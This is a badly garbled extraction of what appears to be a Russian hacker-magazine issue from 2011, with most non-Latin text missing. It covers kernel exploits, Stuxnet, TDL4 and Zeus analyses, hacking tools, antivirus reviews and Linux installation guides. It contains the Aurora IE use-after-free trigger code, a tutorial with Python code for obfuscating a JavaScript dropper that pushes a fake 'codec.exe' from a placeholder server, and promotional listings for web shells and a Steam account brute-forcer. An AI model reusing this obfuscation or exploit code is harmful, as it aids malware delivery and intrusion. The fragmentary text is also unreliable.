/* zero extension */
.endm
LOAD_ARGS:
X+
.macro LOAD_ARGS32 offset
+
movl \offset(%rsp),%r11d
+
movl \offset+8(%rsp),%r10d
+
movl \offset+16(%rsp),%r9d
+
movl \offset+24(%rsp),%r8d
+
movl \offset+40(%rsp),%ecx
+
movl \offset+48(%rsp),%edx
+
movl \offset+56(%rsp),%esi
+
movl \offset+64(%rsp),%edi
+
movl \offset+72(%rsp),%eax <----
rax
X 01 (144) 2011
.endm
24 2008
, :).
-
movl \offset+72(%rsp),%eax
.endm
FreeBSD 7.2
cmpl
$(IA32_NR_syscalls-1),%eax
+
cmpq
$(IA32_NR_syscalls-1),%rax <--- rax eax
4 .
FreeBSD: nfs_mount()
Patroklos
Argyroudis, argp.
nfs_mount,
mount() nmount(),
, . sys/nfsclient/nfs_vfsops.c 8.0:
* 1094
if (!has_fh_opt) {
* 1095
error = copyin((caddr_t)args.fh,
(caddr_t)nfh,
<-----
*
*
*
*
1096
1097
1098
1099
: vfs.usermount
( ). , :
+
if (args.fhsize < 0 || args.fhsize > NFSX_
V3FHMAX) {
+
vfs_mount_error(mp, "Bad file handle");
+
error = EINVAL;
+
goto out;
+
}
FreeBSD 8.0 ,
, canary word. FreeBSD
stack-smashing protection.
. ret , canary word
X 01 (144) 2011
FreeBSD
. , (ring 3), (ring 0). -
7- , 8- DoS' :(.
3 .
Windows
! ,
mail.ru
Windows 17- !.
32- Windows, NT 4.0 !
Windows 16-
NTVDM (NT Virtual DOS Mode).
Tavis Ormandy
Google. , /.
:
1. VDM SeTcbPrivilege.
2. (Ring 3 )
.
3. -
071
Tavis'
trap frame. Tavis Ormandy !
. . NTVMD-,
csrss API-
,
.
. CPL (Current Privilege Level)
cs
ss, ,
Virtual-8086.
x86 , ,
16 , 20- .
: (cs << 4) + (eip & 0xffff).
Virtual-8086.
, cs !
. iret
.
Intel 6 ,
IF-. : Pre-commit
Post-commit. , ring 3.
VDM,
NtVdmControl, pre-commit trap-frame.
2 . Internet
Explorer: Aurora
IE (CVE-20100249),
Aurora.
Microsoft',
( MS).
CVE-2010-0249 mshtml.dll. ,
use-after-free. , JavaScript,
:
document.CreateEventObject() ;
document.getElementById(),
, JavaScript'a -
072
-
, !
-
srcElement CEventObj::GenericGetElement
mshtml.dll, , , CElement::
GetDocPtr.
:
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}
function ev2()
{
var data, tmp;
data = "";
tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++)
{
obj[i].data = data;
}
event_obj.srcElement;
}
X 01 (144) 2011
CPL_FindCPLInfo
CPL_LoadAndFindApplet
DSA_GetItemPtr
CPL_LoadCPLModule
CopyIcon
_LoadCPLModule
_InitializeCPLModule
hIcon
LoadLibraryW
hModule
_InitializeControl
Data Access
Control Flow
DSA_InsertItem
LoadImage
, DEP,
ASLR,
, .
Google: , 12
Gmail.
! :) ,
, , , Google .
17 . Microsoft
advisory.
( ;)),
Microsoft VirusBlokAda
, .
-, - :).
stack/heap overflow
.. ,
:).
Control Panel,
Explorer.exe.
shell32.dll,
,
( ) LoadLibraryW.
,
(DEP/ASLR/SEHOP) !
1 .
lnk-
2011-?
<body>
<span id="sp1">
<img src="aurora.gif onload="ev1(event)">
<-----
</span>
</body>
, , , , top 5! Stuxnet,
USB-.
MetaSploit'e , WebDAV .
:
17 .
VirusBlokAda ,
Windows 7,
USB-
(Windows Explorer).
X 01 (144) 2011
,
2010 , .
Stuxnet
SCADA-, Aurora
, -
:). , (,
, ) 0day .
, ,
Windows Vista, 2008, 7,
Stuxnet! . , , . z
073
icq 884888, http://snipper.ru
X-TOOLS
: Steam`O Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: INSIDER
, steam-.
:
(http, socks 4/5);
;
;
good;
error
( , ).
:
1.
txt- (
login;pass , proxy:port);
2. ;
3. START.
,
, ,
.
: Mikstura
: *nix/win
: Dr.TRO
php-.
:
;
074
, data:, php://
input;
data: php://input,
;
-
;
, , full path,
( 15
"../");
( );
HTTP- perl-
LWP::Protocol::socks.
.
http://forum.
inattack.ru/Mikstura-Mini-utilita-Dlja-RabotyS-Inkludami-t23830.html.
php-.
:). ,
- ITSecTeam Shell v2.1!
:
(66 );
;
;
;
MySQL, MSSQL,
PostgreSQL, Oracle & IBM DB2;
;
, PHP safe mode;
Windows;
;
;
zip ;
;
( php);
;
-;
DoS;
sql/gzip-;
-
;
;
DDoS-;
;
symlink mod_security .htaccess;
;
php;
;
magic_quotes;
.
,
, :).
http://itsecteam.
com/en/tools/itsecteam_shell.htm.
: ICQuinValuer
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Dank & DeMerk &
NightEagle
.
X 01 (144) 2011
ICQ-
ICQ-
.
ICQ :
(viz/
inviz) ;
( ,
, , , , , ..);
;
;
;
;
;
.
,
:).
forum.asechka.ru/showthread.php?t=118542.
: Easteregger
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
:
,
. . Eastegger
:).
( ),
.
,
, , , ,
.
.
:
1. (, , );
2. , , , .
,
Torrent. :
X 01 (144) 2011
.
Help-About Torrent
( Torrent).
torrent .
T
(Tris).
P, .
WSO-
, Eastegger',
:).
http://eastegger.com.
: PWGen
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Christian Thoeing
.
PWGen,
. :
Free Open-Source;
AES SHA-2;
(
DLL',
Windows);
(
, ,
);
;
;
;
.
,
http://pwgen-win.
sourceforge.net. *nix , http://pwgen.sourceforge.
net.
WSO. Krist_ALL
, :
(
downloader', , , ,
);
( writable,
);
,
(
INFO);
;
( );
;
INFO;
;
php,
php;
milw0rm;
;
$t
(1 ,
2 );
.
http://exploit.in/forum/index.
php?showtopic=40939.z
075
MALWARE
lozovsky@gameland.ru
/INTERNET SECURITY
() Malware
. , ,
.
, , ,
:).
, , .
,
, :
anti-malware.ru, ,
- Deeoni$ ,
,
X
1. ,
USB- .
Microsoft Security
Essentials:
, ,
,
.
:
,
,
64- .
2.
: KIS, Dr. Web, Nod32, Symantec.
.
Avast.
3. ,
cloud- Symantec:
,
.
,
Symantec
.
:).
, , :
1. , . ?
2. , .
, .
3. , -
. ?
Security.
. Idle Mode
,
.
: -?. ,
:). , .
Symantec ,
.
,
.
.
exe - , ,
? .. , ,
:
, -
, .
.
, , .
.
, ,
.
1. .
STEP ,
PC_ZONE DVD
: Norton Internet
076
,
.
(
) ,
- :). IM-,
.
Dr.Web, -
, .
2. Dr.Web . . Spyder, .
,
.
3. :). , 10 KIS.
, ,
.
KIS ,
.
,
X
1. Microsoft
Security Essentials, ,
- .
.
,
,
. -
, , .
2. -: , , AVG,
Essentials. , -
, ,
, .
3. -,
.
X 01 (144) 2011
,
MALWARE
,
UNIXOID
1. : KIS2011 Dr.Web
1.
, vast!. KIS
( , ,
:)), Dr.Web , 90-
OneHalf.
, , .
, : -,
-
- .
2. Avast! . ,
.
,
,
,
: , ,
.
.
3. Comodo. -,
Internet Security
, .
:), .
,
, ,
, ,
.
Eset Nod32.
, Dr.Web
Cureit!
.
. , :
- (
Win2k3r2) Kerio WinRoute Firewall
McAfee
;
(OpenBSD) Spamd
( greylisting) + Sendmail (
) + Clamav + Procmail ( ,
Maildir);
(WinXP) Eset Nod32
+ Dr.Web Cureit! + Kaspersky Virus Removal
Tool + MalwareBytes Anti-malware + AVZ (
) + Dr.Web LiveCD (
) + Acronis True Image BootCD (
/ ).
2.
Nod32,
.
.
3.
.
, ,
,
ANTI-MALWARE.RU
1.
Windows 7 x64,
,
.
Microsoft
Security Essentials, Avast 5 Free Anti-virus. ,
-
,
.
2. . : X 01 (144) 2011
,
,
.
, ,
, Microsoft, Avast Avira.
,
,
Windows XP,
, Kaspersky
Internet Security, Norton Internet
Security BitDefender Internet
Security.
3. ,
. ,
: , :
-
squid (
), havp clamav. : clamav ,
havp . Linux
.
.
DEEONI$,
- X
, , -
,
.
, Symantec
(Norton), Microsoft, Avast Panda.
,
,
,
.
Internet Security Total
Security -
( -).
, (
)
: ,
, , ,
.
,
, ,
.
Norton 360 -,
,
. z
077
MALWARE
presidentua http://tutamc.com
-
!
!
JS-
Python
.
,
. ?
!
-
.
80
.
JavaScript XOR. .
JavaScript
.
Internet Explorer,
. ,
,
,
.
JavaScript (, ).
:).
078
, ,
. ,
,
, .
JavaScript .
,
. - ( ,
, , ),
.
,
. ,
.
X 01 (144) 2011
, .
, +
String.fromCharCode ():
vary a = "co" + "de" + String.fromCharCode(69)
+ "c";
(
) .
JavaScript, go_codec. ,
. , ,
. , ,
, go_codec - SDdsdsW,
go_codec SDdsdsW.
:
Trial-Reset
JavaScripta,
:
<script>
function go_codec()
{
location.href = "http://server/codec.exe";
}
var message = "You don't have codec for video";
alert(message);
setTimeout( go_codec(), 1000);
</script>
.
hex-. Python , :
import random
from string import letters
def morf_html_string(html):
rez = ''
for s in html:
if s in letters and random.choice([True,
False, False, False]):
rez += "&#%s;" % ord(s)
else:
rez += s
return rez
, (in
letters), 25% hex-. , a a.
You don't have codec for video - :
X 01 (144) 2011
class G(object):
rand_var = {}
.
:
def rand_var(var):
if var in G.rand_var:
return G.rand_var[var]
G.rand_var[var] = generate_string(5, 10)
return G.rand_var[var]
;
, .
, 5
10 , .
, generate_
string! :
DVD
dvd
, JavaScript
.
,
.
WARNING
warning
.
Internet Explorer.
.
,
. :).
, , , .
- .
:
var b="aaa";
if ("aaaa"=="sdsdsd") asdasdas();
function sfsf(){};
get_el_, - :
079
MALWARE
def get_el_1():
return "var %s='%s';" % (
generate_string(4,6),
generate_string(4,6)
)
(get_
el_1, get_el_2 get_el_3) :
def random_js_element():
def get_el_1():
return "var %s='%s';" % (
generate_string(),
generate_string()
)
def get_el_2():
return "if ('%s'=='%s') %s();" % (
generate_string(),
generate_string(),
generate_string()
);
def get_el_3():
return "function %s(){}" % (
generate_string())
from tornado.template import Template
template_js = "our_example_template"
js = Template(template_js).generate(
rand_var=rand_var,
morf_html_string=morf_html_string,
random_js_element=random_js_element
)
fnc = "get_el_%s"%random.randrange(1,4)
return locals()[fnc]()
, .
,
locals().
, , :
>>> random_js_element()
'function aErfSA(){}'
>>> random_js_element()
"if ('uHsJi'=='YvEwVNttta') pxQdHssd();"
>>> random_js_element()
"var yrSfsdgS='OywZCvq';"
,
.
, . . Template- - TornadoWeb.
JavaScript. ,
.
,
, JavaScript
:
{{ }}
var a = "{{ (" ") }}"
, , .
Pythona
random randrange
choice. ,
start stop:
random.randrange(start, stop)
.
,
- . , 33%:
if random.choice([True, False, False]):
print "33.33333%"
string
:
from string import letters
>>> letters
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu
vwxyz'
letters ( ),
ascii_letters .
, .
080
X 01 (144) 2011
server/codec.exe") }}";
}
var {{ rand_var("message") }} = "{{
morf_html_string("You don't have codec for
video") }}";
alert({{ rand_var("message") }});
setTimeout( {{ rand_var("go_codec") }}(),
1000);
HTTP://WWW
{{ random_js_element() }}
</script>
,
{{ random_js_element() }}
( ). , rand_var - {{
rand_var("go_codec") }}.
{{ morf_html_string("http://server/codec.
exe") }}.
, .
, ,
:
location.href = "http://codec/codec.exe";
:
var a = location;
a.href = "http://codec/codec.exe";
a["h"+"ref"] = "http://codec/codec.exe";
, :
var {{ rand_var("location") }} = location;
{{ rand_var("location") }}["{{ morf_html_
string("href") }} "] = "{{ morf_html_
string("http://codec/codec.exe") }}";
, 2
-
:)
JavaScript-:
def many_random_js(start=0, stop=5):
rez = ""
for _ in xrange(random.randrange(
start, stop)):
rez += random_js_element()
return rez
{{ many_random_js() }}.
. :
, ,
. ,
, JavaScript- . , ,
.
, ,
? .
,
. .
PS: , , !
(-, ,
, , . ) :). z
links
,
:
http://developer.
yahoo.com/yui/compressor/
http://code.google.
com/closure/compiler/
http://jscrambler.
com/
http://javascriptobfuscator.com/
http://www.stunnix.
com/prod/jo/
http://www.crockford.com/javascript/
jsmin.html
http://www.daftlogic.com/projectsonline-javascriptobfuscator.htm
TornadoWeb,
http://www.tornadoweb.org/
Python. ,
collections defaultdict, rand_var.
defaultdict
.
:
>>> a = defaultdict(generate_string)
>>> a["go_codec"]
dqQSfw
>>> a["location"]
EdstEf
>>> a["go_codec"]
dqQSfw
X 01 (144) 2011
081
MALWARE
, ESET, www.twitter.com/matrosov
TO-5
2010
,
.
,
,
. 2010 ,
.
82
082
X 01 (144) 2011
>> coding
Stuxnet
. , Stuxnet
,
.
. , .
Stuxnet ( )
. HIPS-,
. , , , Realtek JMicron.
Microsoft,
, . ? MS! , MS ,
. ,
, , .
.
, Stuxnet .
- ,
, , , .
0-day
,
. MS10-046,
, LNK/PIF-.
,
.
,
,
.
:
X 01 (144) 2011
tdl
config.ini
File table
TDL3
83
083
MALWARE
Lnk-, Stuxnet
TDL4 MBR
. ,
Stuxnet . .
( Vendor-ID) (Task
Scheduler), SYSTEM Vista/Win7/Win2008.
.
, ,
. ,
Smartcard API !
,
( PoC) Microsoft. , ,
:).
CVE-2010-2772, Siemens Simatic
WinCC PCS 7 SCADA, -
, TDL4
84
084
X 01 (144) 2011
>> coding
STUXNET
Win2000/XP
removable devices
MS10-046
MS10-073
privilege escalation
propagation
Stuxnet propagation
and installation vectors
in MS Windows
installation
privilege escalation
local network
Vista/Win7/Server 2008
MS08-067
MS10-0XX
MS10-061
Microsoft SQL WinCC.
TDL3
SeLoadDriver
PrintProcessor
IMAGE_FILE_DLL
PE-
ShellExecute
(AddPrintProcessor)
API
(DeletePrintProcessor)
API
( TDL3)
DRIVER_SECTION
pci.sys
DRIVER_SECTION
Driver1.sys
Stuxnet ,
:
- , Microsoft
Visual C++. , . ,
. -, : , .
,
,
.
P2P,
, , .
, Stuxnet,
. Stuxnet Under the Microscope
70 ,
:).
TDL4
, 64-,
. TDL4
TDL3,
. TDL4
64 Windows.
,
DRIVER_SECTION
Driver2.sys
DRIVER_SECTION
DriverN.sys
DRIVER_SECTION
Driver32k.sys
X 01 (144) 2011
85
085
MALWARE
-
MBR
. , Mebroot, StonedBoot . ,
, TDL3 , , 64-
, .
, :
(
\\??\PhysicalDrive0),
C:;
( TDL3 );
MBR-,
;
TDL3
,
, , ,
. , 3.273.
TDL3 2010 ,
( - MS :)) HIPS-.
TDL3.
Stuxnet
086
HIPS-
WinAPI- AddPrintProcessor
AddPrintProvidor,
HIPS-,
X 01 (144) 2011
>> coding
HIPS
Stuxnet
TDL4
TDL3
Dalixi
Zeus2
MBR
PRIVILEGE, / .
, WinAPI-
RtlAdjustPrivilge. ,
%PrintProcessor% AddPrintProcessor/
AddPrintProvidor, tdl. RPC
( ).
TDL3
. ,
.
Hex-Rays ,
. , , , ,
. , , , , ,
. TDL3 , .
BOOL AddPrintProcessor(
__in LPTSTR pName,
__in LPTSTR pEnvironment,
__in LPTSTR pPathName,
__in LPTSTR pPrintProcessorName
);
:
BOOL AddPrintProvidor(
__in LPTSTR pName,
__in DWORD Level,
__in LPBYTE pProviderInfo
);
TDL3 :
;
.
, , SE_LOAD_DRIVER_
X 01 (144) 2011
TDL3 .
,
,
.
TDL3
, .
.
,
TDL3 ( ,
).
,
.
TDL3
. , ,
, .
:
(tdlcmd.dll);
(config.ini);
(tdl);
(rsrc.dat);
.
, ( ) , TDL3 ,
.
tfd.
exe (TdlFsDumper, http://j.mp/tdl_dump). -
087
MALWARE
FS .
Dalixi
.
,
Dalixi HIPS
.
, callback-,
.
HIPS ( :
PsSetLoadImageNotifyRoutine, PsSetCreateProcessNotifyRoutine,
PsCreateThreadNotifyRoutine). ,
, . Dalixi
ZwSystemDebugControl, ntdll.dll.
NTSYSAPI
NTSTATUS
NTAPI
NtSystemDebugControl(
IN SYSDBG_COMMAND
IN PVOID
IN ULONG
OUT PVOID
IN ULONG
OUT PULONG
);
Command,
InputBuffer OPTIONAL,
InputBufferLength,
OutputBuffer OPTIONAL,
OutputBufferLength,
ReturnLength OPTIONAL
,
SysDbgCopyMemoryChunks_1
, , , .
NtSystemDebugControl
, Dalixi SysDbgCopyMemoryChunks_1 ,
.
InputBuffer , :
typedef struct _CPY_MEM_CHUNCKS_BUFFER
{
void *Destination;
// pointer to kernel-mode destination buffer
void *Source;
// pointer to user-mode source buffer
ULONG Size;
// size of the user-mode source buffer
} CPY_MEM_CHUNCKS_BUFFER, *PCPY_MEM_CHUNCKS_BUFFER;
, ,
Dalixi ,
. callback.
Zeus 2..
Zeus.
088
,
(
).
, Zeus,
VNC
Jabber.
X.509- , , ,
,
. CryptoAPI PFXImportCertStore
(
).
HCERTSTORE WINAPI PFXImportCertStore(
__in CRYPT_DATA_BLOB *pPFX,
__in LPCWSTR szPassword,
__in DWORD dwFlags
);
, , ,
Zeus ,
Stuxnet.
, zeus-.
, , ,
- .
, ,
.
Zeus ,
,
MS Internet Explorer
. , ,
,
.
, , .
Zeus
.
,
,
-
Smartcard API.
, Zeus,
SpyEye, , ,
, -
. C&C
, , .
.
. , . z
zobnin@gm ail.com
Linux BSD
,
:
, .
, . ,
, .
,
,
. ,
,
.
,
. , ,
, .
,
,
- (, Windows). ,
(,
X 01 (144) 2011
Linux), .
.
,
.
,
.
Linux,
Windows
-
.
UNetbootin
(unetbootin.sourceforge.net) USB- ,
.
, Ubuntu (www.
ubuntu.com/desktop/get-ubuntu/windowsinstaller) OpenSUSE (en.opensuse.org/
Instlux), UNetbootin
( Linux, BSD,
Linux). ,
, grub4dos ISO- -
089
UNIXOID
FreeBSD
Windows,
VirtualBox-3.2.10-66523-Win.exe.
,
- ,
.
, :
> cd c:\Program Files\Oracle\VirtualBox
> VBoxManage internalcommands createrawvmdk \
-filename c:\realhd.vmdk \
-rawdisk \\.\PhysicalDrive0 -register
Windows
. .
,
UNIX- , ,
UNIX (,
BSD Linux-). UNetbootin, ISO-
initrd- Grub (
BSD).
Windows Linux.
,
. , ,
Solaris
, . VirtualBox,
(www.virtualbox.org).
090
FreeBSD Linux.
Linux FreeBSD-,
Ubuntu,
UNetbootin, grub,
:
#
#
#
#
#
#
#
cd /usr/ports/sysutils/grub
sudo make install clean
mkdir /boot/grub
cp /usr/local/share/grub/i386-freebsd/* /boot/grub/
touch /boot/grub/menu.lst
sysctl kern.geom.debugflags=16
grub-install /dev/ad0
menu.lst:
# vi /boot/grub/menu.lst
title Ubuntu 10.10 AutoInstall
# X, Y, Z ,
, ISO-
map (hdX,Y,Z)/ubuntu-10.10-server-i386-auto.iso
(hd32)
map --hook
chainloader (hd32)
).
,
.
DHCP-, ,
SSH- ,
(, ).
,
SSH.
(
). ,
.
,
ISO- Ubuntu,
.
Ubuntu-10.10 ( ),
(
preseed-). :
1. Ubuntu 10.10
:
$ sudo mount -o loop \
ubuntu-10.10-server-i386.iso /cdrom
$ mkdir mycd
$ rsync -a /cdrom/ mycd
2. preseed- ( ):
$ vi auto.seed
# -
d-i debian-installer/locale string ru_RU
# ,
# ru,
d-i console-setup/ask_detect boolean false
d-i console-setup/layoutcode string us
#
d-i netcfg/choose_interface select auto
# FTP
d-i mirror/protocol string ftp
#
d-i partman-auto/init_automatically_partition select
biggest_free
#
d-i partman-auto/choose_recipe select atomic
# Ext4
d-i partman/default_filesystem string ext4
# ,
d-i partman-partitioning/confirm_write_new_label
boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
# user ( resu)
d-i passwd/user-fullname string Ubuntu User
091
UNIXOID
# IP-
d-i netcfg/get_ipaddress string 192.168.0.1
#
d-i netcfg/get_netmask string 255.255.255.0
#
d-i netcfg/get_gateway string 192.168.0.2
#
d-i netcfg/confirm_static boolean true
3. , preseed-:
$ sed -e 's#file=/cdrom/preseed/ubuntu.
seed#auto=true\ priority=critical\ file=/cdrom/
preseed/auto.seed#' mycd/isolinux/txt.cfg > txt.cfg
$ sudo mv txt.cfg mycd/isolinux/
UNetbootin
d-i passwd/username string user
d-i passwd/user-password-crypted password 458c9bfe3b6
716ad976383cf20a3dcf4
d-i user-setup/allow-password-weak boolean true
#
# kubuntu-desktop ubuntu-server,
, us,
,
openssh-server user resu,
SSH.
( DHCP), d-i netcfg/choose_interface
select auto , :
# DNS-
d-i netcfg/get_nameservers string 8.8.8.8
Grub4dos Vista/Seven
1. C: grldr, grldr.mbr menu.lst;
2. Windows:
> bcdedit /create /d "Grub4Dos" /application
bootsector
3. (ID ):
> bcdedit /set ID device partition=C:
> bcdedit /set ID path \grldr.mbr
> bcdedit /displayorder ID /addlast
092
4. :
$ cd mycd
$ sudo rm md5sum.txt
$ find -type f -print0 | sudo xargs -0 md5sum | \
grep -v isolinux/boot.cat | sudo tee md5sum.txt
5. ISO-:
$ sudo mkisofs -D -r -V "Ubuntu 10.10 AutoInstall" \
-cache-inodes -J -l -b isolinux/isolinux.bin \
-c isolinux/boot.cat -no-emul-boot \
-boot-load-size 4 -boot-info-table \
-o ../ubuntu-10.10-server-i386-auto.iso .
ISO- ,
UNetbootin, ,
ISO-, .
UNetbootin
, ,
UNetbootin , .
ISO-, UNetbootin.
. 30
, .
Debian,
.
,
(, Kickstart RedHat).
UNetbootin. ,
, .
Grub4dos Grub,
FAT32 NTFS-, Ubuntu
WinXP.
Grub4dos
Windows , .
sourceforge.net/projects/grub4dos/
files/, Grub4dos
grldr menu.lst C:. c:/boot.ini
[boot loader] :
default=c:\grld
:
X 01 (144) 2011
2. rc.conf,
:
WARNING
$ cp conf/rc.conf.sample conf/rc.conf
:
$ vi conf/rc.conf
# IP-
defaultrouter="192.168.0.1"
#
ifconfig_re0="inet 192.168.0.2 netmask
255.255.255.0"
WinXP
, Netbootin
c:\grldr="Grub4Dos"
. c:/menu.lst
:
title Ubuntu 10.10 AutoInstall
find --set-root /ubuntu-10.10-serveri386-auto.iso
map /ubuntu-10.10-server-i386-auto.iso
(hd32)
map --hook
chainloader (hd32)
. ISO- C:,
, 30 ,
SSH user resu.
Linux FreeBSD.
, . FreeBSD , Linux, , .
, , , :
Linux,
.
FreeBSD, SSH.
mfsBSD (mfsbsd.vx.sk),
FreeBSD, .
, FreeBSD,
sysinstall. :
1. mfsBSD
:
$ wget mfsbsd.vx.sk/release/mfsbsd-1.0.tar.gz
$ tar xzf mfsbsd-1.0.tar.gz
$ cd mfsbsd-1.0
X 01 (144) 2011
re0 .
,
(dmesg ),
(
, , re0 RealTek
8139C, re).
,
DHCP,
:
warning
INFO
ifconfig_re0="DHCP"
3. - ISO-
FreeBSD ( ftp://ftp.freebsd.org, ):
$ sudo mount -o loop \
FreeBSD-8.1-RELEASE-i386-disc1.iso /cdrom
4.
:
info
Linux
VirtualBox
qemu:
$ sudo qemu -hda
/dev/sda -cdrom
ubuntu-10.10-desktop-i386.iso -boot d
5. root, :
# dd if=/root/disk.img of=/dev/sda bs=1m
# reboot
root, mfsroot,
sysinstall
FreeBSD.
FTP HTTP.
,
( , ),
.
, , ,
, ,
,
. ,
, , -
. z
093
UNIXOID
Adept adeptg@gmail.com
E
C
R
U
O
S
N
E
P
O
, , ,
, .
OpenSource 2010 .
, .
, Sun Microsystems,
, - ,
2008. 2009 , Oracle,
7 .
2010
. , Oracle (
OpenSource) ,
Sun.
, Java ,
Oracle . bugfix security- JDK6.
Oracle
JDK7 JDK8 2011 2012
.
VM
, , unicode, XML
JDBC.
OpenSolaris , Java: Oracle
.
, Solaris
Express. ,
;
094
( CDDL,
GPL),
. OpenSolaris
.
, Illumos. ,
.
.
Sun Oracle
MySQL. Oracle ,
,
. MySQL,
,
MariaDB. ,
Oracle
MySQL
( Sun).
OpenSource- , Oracle
OpenOffice. 2010 3.2
:
. ,
, , ,
;
MS Office,
,
, ;
OpenType, TrueType;
Calc , .
Sun OpenSource-.
VirtualBox. ,
,
-. ,
(
),
, , USB
RDP-,
RDP-.
, Sun Netbeans.
Oracle . ,
,
. 6.9
( RoR 3, JavaFX
SDK 1.3, ), 2011
7.0.
Linux
Sun , Linux
: 2.6.33-2.6.36. X 01 (144) 2011
HTTP://WWW
links
illumos.org
OpenSolaris
www.documentfoundation.org The
Document Foundation
meego.com
Meego
INFO
FireFox 4
info
Oracle
Sun
][ 131.
FireFox 4
,
:
Nouveau . Nouveau
,
Nvidia -. nv , , 3D-;
DRBD (Distributed Replicated
Block Device) , RAID-1 ;
Ceph () LogFS ( SSD);
. ,
btrfs Direct I/O,
.
,
, , .
XFS ,
,
.
.
CIFS
. Squashfs
LZO;
/
PCI, USB SCSI-;
X 01 (144) 2011
. : ( )
( ).
, , ;
DRM- (Direct Rendering Manager,
Digital Rights Management) Intel
H.264 VC1
G45+;
L2TP 3 (RFC
3931);
: make nconfig.
, menuconfig,
;
AppArmor .
AppArmor
SELinux ,
AppArmor ,
. SELinux .
AppArmor , SELinux
;
Tile,
;
. , .
DE 2010
. changelog Gnome
, 3.0 ( ,
6 2011). ,
2.30 2.32:
095
UNIXOID
Meego
Nautilus . /
;
GNOME Keyboard Indicator,
;
gnome-system-tools
: ,
;
GNOME Terminal: ,
;
Brasero FileRoller
PackageKit;
Empathy -,
;
- Epiphany gnomekeyring;
IDE Anjuta Python Vala.
Changelog KDE 2010 :
Plasma Netbook ;
Kwin (,
);
096
;
;
;
Plasma ;
KNetworkManager;
Dolphin ;
Kmail
.
, - k3b 2.0 KDE4
Blu-ray.
KDE 4.6 ( 2011)
:
Kwin;
Nepomuk ;
Plasma ;
PowerDevil v2;
KSnapshot
( ).
,
. OpenSource- Firefox.
netmarketshare.com, 2010
23% . 2010 3.6, 2011 Firefox 4.
FF 3.6:
Acid3 94 100;
15% 3.5;
WOFF.
3.6.2;
Personas;
HTML5- .
FF 3.6 Mozilla
.
,
, .
(3.6.4)
,
. .
X 01 (144) 2011
Plasma Netbook
Mozilla 2010
: : Sothink Web Video Downloader 4.0 Master
Filer. , ( ),
4600 Windows (
). Mozilla ,
.
Firefox4:
, ;
( Google
Chrome).
- WebM VP8;
,
, .
Mozilla Sync;
64- Linux,
Mac OS X Windows;
JetPack, HTML, CSS
Javascript. XUL,
;
WebGL,
3D- . ;
X 01 (144) 2011
2D- (,
Vista/Seven. Linux Mac OS X );
App Tab,
.
,
Pin as App Tab;
.
Firefox ,
, Google Chrome/Chromium.
2010 Google Chrome Linux (
5) :
,
JavaScript;
, ;
HTML5, Web Sockets, Drag-and-drop,
GeolocationAPI App Cache.
2010 Chrome :
( Release Early, Release
Often). 6 ,
- :
- Chrome Web Store.
- Google.
Chrome OS. ,
5%
( 30% App Store);
15% ;
Auto-fill.
,
;
.
6 2010 7:
, ;
,
;
097
UNIXOID
OOo 3.3
OOo 3.3
FileAPI ,
.
Chrome 8 ,
:
2D-
GPU;
WebGL;
;
( , Linux);
:
.
, Ubuntu,
: . 10.04.
, LTS (Long Term Support),
, .
:
. : , , .
LTS-, ;
Nvidia Nouveau;
HAL .
10.10.10 Ubuntu 10.10 :
:
, ,
btrfs, ;
.
, Fluendo. ! , ,
;
Netbook edition Canonical
Unity.
, Canonical
098
. : , (
) ,
gnome-settings-daemon 100% . ,
.
11.04 ( Natty Narwhal, )
Ubuntu Developer Summit:
GNOME 3.0 (GNOME Shell)
Unity. Netbook edition
Desktop edition CD;
- banshee. , ,
Ubuntu mono (f-spot), .
;
, 2.6.38, X.Org Server 1.10 (
X.Org Server 1.09 1.10),
Mesa 7.10, Radeon X1000 (R500)
R300 Gallium3D;
ARM,
.
Ubuntu, Debian, 2010
. , ,
. ,
2010. ,
:
backports.org backports.debian.org. ,
;
rolling- ()
Debian;
Debian: snapshot.debian.org,
. ,
.
RPM-based , Fedora,
, 13 14 :
Btrfs. Yum ;
Python 3, Python 2.
D;
Spice (Simple Protocol for Independent
Computing Environments) ,
QEMU. ,
.
;
MeeGo;
OpenSCAP. SCAP (Security Content Automation Protocol)
,
. OpenSCAP , SCAP, ,
, oscap-scan
, OVAL XCCDF.
BSD- FreeBSD 2010
: 7.3 8.1. 8.1 :
ZFSv14;
X 01 (144) 2011
/
, , 2010,
Linux .
Linux Google Android
2010 . ,
Android- Apple iPhone
( , ),
Android Market 100 000.
2010 Android 2.2 :
Adobe Flash 10.1;
Microsoft Exchange;
Dalvik JIT, ;
Wi-Fi;
. ,
;
.
2010 Android 2.3.
:
WebM;
;
;
.
Android ,
Linux . ,
1-2 , . ,
Meego Maemo (Linux
Nokia) Moblin (Linux Intel).
Linux Foundation. Android , Meego
( VCS-, BSD). Meego :
, CarPC.
(1.1) :
Linux 2.6.35, GCC 4.5.0;
X.Org 1.9.0.
Meego ;
Qt 4.7 ,
;
Btrfs.
, ;
Zypper, RPM-;
oFono,
ConnMan;
Tracker;
Bluetooth- BlueZ, D-BUS, GStreamer PulseAudio.
,
-.
Meego AppUp,
Intel Moblin. , , , Meego, ,
(Nokia N900 Aava Mobile). , ( ) ;
.
, Meego (Nokia N9)
2011.
X 01 (144) 2011
KDE.
.
BackTrack.
2.6.34 Fluxbox-. NMAP
: 2010
5.20, 5.30BETA1 5.35DC1
:
UDP-;
100 NSE (Nmap Scripting Engine) ;
600 1300
;
Nping,
;
.
1.4.1 Wireshark (
Ethereal):
80 ;
Python ( *nix, Windows
);
;
JPEG RTP-
Wireshark;
( libpcap 1.0.0 );
( libpcap 1.0.0 ).
- Nikto : 2.1.1-2.1.3.
, :
, ;
2300 RFI (remote file inclusion) ;
;
;
Libwhisker
IDS;
XML- SSL.
2010 Canonical ,
Ubuntu Desktop 12
. .
Linux . 1-2%
.
, 2010
, , Linux
. ,
, Linux (
).z
099
UNIXOID
hatchet maks.hatchet@yandex.ru
, ,
, Linux BSD-
, ,
.
,
. , ,
, Linux-,
,
Linux ,
4 .
:
,
: swap,
, Linux, /home.
Linux-,
. . ,
Linux- , .
-
100
,
:
, , ,
/home-
, .
